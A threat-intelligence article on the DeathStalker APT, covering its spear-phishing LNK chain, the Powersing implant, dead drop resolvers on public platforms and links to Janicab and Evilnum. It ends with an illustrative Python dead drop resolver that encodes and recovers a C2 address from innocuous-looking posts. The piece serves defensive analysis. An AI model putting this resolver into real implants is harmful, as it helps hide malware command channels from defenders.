DeathStalker APT

DeathStalker APT Description

DeathStalker is the name given to an Advanced Persistent Threat (APT) group that researchers believe operates as mercenaries offering hack-for-hire services. That assessment rests on the characteristics of the operations attributed to the group. Unlike typical cybercriminals, DeathStalker does not infect its victims with ransomware and does not harvest banking or credit/debit card credentials, which indicates that the operators are not seeking direct financial gain from their victims. Instead, DeathStalker specializes in exfiltrating data from a narrow range of targets. Apart from a few exceptions, such as an attack on a diplomatic entity, the group has consistently gone after private companies operating in the financial sector: consultancy firms, technology companies, law firms and the like. As for geographic spread, tracking the traffic generated by one of DeathStalker's main tools, a malware implant called Powersing, revealed victims in China, Cyprus, Israel, Argentina, Lebanon, Switzerland, Turkey, Taiwan, the United Kingdom and the United Arab Emirates.

Spear-Phishing and Dead Drop Resolvers

A close look at DeathStalker's attack chain shows that the group delivers its main tool through spear-phishing emails carrying malicious attachments. The attachments masquerade as ordinary documents or archives but actually carry a malicious LNK (Windows shortcut) file. When the unsuspecting user opens it, a convoluted multi-stage chain begins. In the first stage, a decoy document is displayed to the user to mask the activity going on in the background and raise as little suspicion as possible. Persistence is established by creating a shortcut in the Windows Startup folder that launches a VBE (encoded VBScript) startup script. The actual malware payload is dropped in the second stage. It contacts a dead drop resolver to obtain the real Command-and-Control (C&C, C2) server address. Once communication is established, Powersing does only two things: it takes screenshots of the system and sends them to the C2 server immediately, and it waits for PowerShell scripts supplied by the C2 and executes them.

The way Powersing arrives at its C2 address is unusual. The operators leave strings carrying the initial data on various public services as posts, comments, reviews, user profiles and so on; the researchers found such messages on Google+, Reddit, ShockChan, Tumblr, Twitter, YouTube, WordPress and Imgur. Using well-known public services almost guarantees that the initial connection succeeds: the traffic blends in with the traffic those platforms normally generate, and companies would find it hard to blacklist the platforms outright. There is a drawback for the attackers, though, as removing their traces becomes nearly impossible. That is how researchers were able to determine that the first signs of Powersing activity date back to 2017.

Connections between Powersing and Other Malware Families

Powersing has some peculiar characteristics that are not common. So when another malware family is found to have almost identical attributes, it supports a plausible hypothesis that either both were developed by the same group or the threat actors behind them work closely together. In Powersing's case, similarities have been found with two other malware families, Janicab and Evilnum.

To start with, all three are delivered through LNK files hidden in attachments to spear-phishing emails. Admittedly, that is a common tactic, but all three also obtain their C2 addresses through dead drop resolvers that rely on regular expressions and hardcoded sentences. Finally, there are code overlaps between the three: some variables and functions carry identical names even though the families are written in different programming languages.
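To make the shared dead drop resolver pattern concrete (the mechanism described under "Spear-Phishing and Dead Drop Resolvers" above, and the regular-expression and hardcoded-sentence approach the three families have in common), here is an added example in Python showing both sides of the exchange: the operator encoding a C2 address into an innocuous-looking public post, and the implant extracting and validating it from fetched page content. This is illustrative code written for this article, not Powersing's, Janicab's or Evilnum's; the marker sentence, the base32/XOR/checksum encoding, the XOR key and the sample posts are all assumptions constructed for the demonstration, and the real families use their own schemes.

```python
"""Illustrative dead drop resolver, added to this article as a worked example.

This is not Powersing's, Janicab's or Evilnum's code. The marker sentence,
the encoding scheme, the XOR key and the sample posts below are assumptions
constructed for the demonstration; the real families use their own.
"""
import base64
import binascii
import ipaddress
import re
import struct

# Hardcoded sentence the implant looks for in fetched posts. Ordinary comments
# on the same page never yield a C2 address unless they contain it.
# (Assumption: a real implant picks an innocuous-looking phrase of its own.)
MARKER = "my keyboard doesn't work"

# Regular expression run over every fetched post: the marker followed by a run
# of base32 characters (RFC 4648 alphabet A-Z, 2-7). Base32 is used here because
# it survives case-folding and comment-box filtering; the real families differ.
RESOLVER_RE = re.compile(re.escape(MARKER) + r"\s*([A-Z2-7]{8,}=*)", re.IGNORECASE)

XOR_KEY = 0x5A  # hypothetical one-byte obfuscation key shared by both sides


def encode_c2(ip: str, port: int) -> str:
    """Operator side: wrap an IPv4 address and port in an innocuous-looking post.

    Layout (7 bytes): 4 bytes IPv4 + 2 bytes big-endian port + 1 byte checksum,
    XORed with XOR_KEY and base32-encoded with the padding stripped.
    """
    payload = ipaddress.IPv4Address(ip).packed + struct.pack(">H", port)
    payload += bytes([sum(payload) & 0xFF])
    obfuscated = bytes(b ^ XOR_KEY for b in payload)
    token = base64.b32encode(obfuscated).decode("ascii").rstrip("=")
    return f"Hi all, {MARKER} {token} after the last update, any ideas?"


def decode_token(token: str):
    """Implant side: turn one regex capture back into (ip, port), or None.

    The length and checksum checks are what let the resolver ignore posts that
    merely contain the marker followed by an ordinary word.
    """
    stripped = token.upper().rstrip("=")
    padded = stripped + "=" * (-len(stripped) % 8)
    try:
        obfuscated = base64.b32decode(padded, casefold=True)
    except (binascii.Error, ValueError):
        return None
    payload = bytes(b ^ XOR_KEY for b in obfuscated)
    if len(payload) != 7 or (sum(payload[:6]) & 0xFF) != payload[6]:
        return None
    ip = str(ipaddress.IPv4Address(payload[:4]))
    (port,) = struct.unpack(">H", payload[4:6])
    return ip, port


def resolve_c2(posts):
    """Scan fetched posts in order; return the first C2 that decodes and validates."""
    for post in posts:
        for match in RESOLVER_RE.finditer(post):
            c2 = decode_token(match.group(1))
            if c2 is not None:
                return c2
    return None


# Constructed sample page contents, standing in for comments fetched from a
# public service. 203.0.113.10 is a documentation-only address (RFC 5737).
SAMPLE_POSTS = [
    "Great video, thanks for sharing!",
    # Decoy: contains the marker and an 8-letter word, so the regex matches
    # but the length/checksum check rejects it.
    "Since the update my keyboard doesn't work properly on this laptop :(",
    encode_c2("203.0.113.10", 8443),
    "my keyboard doesn't work either, any fix?",
]

if __name__ == "__main__":
    print(SAMPLE_POSTS[2])
    print(resolve_c2(SAMPLE_POSTS))  # ('203.0.113.10', 8443)
```

Running the block prints the operator's cover post and the address the resolver recovers from it. Two points the code makes that the prose alone does not: the decoy post shows why a regular expression by itself is not a reliable signal, which is why the decoder validates length and checksum before trusting a match; and the marker sentence has to be hardcoded in the implant, so once a sample is in hand the same string can be searched across the public platforms, which is how historical posts allow researchers to date the activity.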